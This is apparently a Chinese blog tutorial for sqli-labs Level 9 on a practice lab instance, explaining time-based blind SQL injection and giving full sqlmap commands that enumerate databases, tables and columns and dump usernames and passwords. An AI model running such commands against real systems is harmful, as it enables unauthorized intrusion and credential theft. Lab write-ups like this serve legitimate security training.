web——sqliabs靶场——第九关——时间盲注

什么是时间盲注

时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。

使用sqlmap不同的技术

sqlmap --technique 参数用来设置具体SQL注入技术

B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U:Union query-based Union查询注入

S:Stacked queries 堆叠注入

T:Time-based blind 基于时间的盲注

Q:lnline queries 内联查询注入

例如:

sqlmap -u "存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。

原文链接:https://blog.csdn.net/qq_49091880/article/details/122301562

使用时间盲注的脚本

1.爆数据库

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch

batch是强制执行所有选择Y

2.爆破表名

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch

3.爆破列名

时间太慢了,sqlmap可以调整回显时间,

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch

--time-sec=1:回显时间为1

4. 爆破列里的数据

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch

时间盲注缺点:用时比较长。

相关推荐
伍哥的传说19 分钟前
鸿蒙系统(HarmonyOS)应用开发之手势锁屏密码锁(PatternLock)
前端·华为·前端框架·harmonyos·鸿蒙
yugi98783821 分钟前
前端跨域问题解决Access to XMLHttpRequest at xxx from has been blocked by CORS policy
前端
浪裡遊32 分钟前
Sass详解:功能特性、常用方法与最佳实践
开发语言·前端·javascript·css·vue.js·rust·sass
旧曲重听11 小时前
最快实现的前端灰度方案
前端·程序人生·状态模式
默默coding的程序猿2 小时前
3.前端和后端参数不一致,后端接不到数据的解决方案
java·前端·spring·ssm·springboot·idea·springcloud
夏梦春蝉2 小时前
ES6从入门到精通:常用知识点
前端·javascript·es6
归于尽2 小时前
useEffect玩转React Hooks生命周期
前端·react.js
G等你下课2 小时前
React useEffect 详解与运用
前端·react.js
我想说一句2 小时前
当饼干遇上代码:一场HTTP与Cookie的奇幻漂流 🍪🌊
前端·javascript
funnycoffee1232 小时前
Huawei 6730 Switch software upgrade example版本升级
java·前端·华为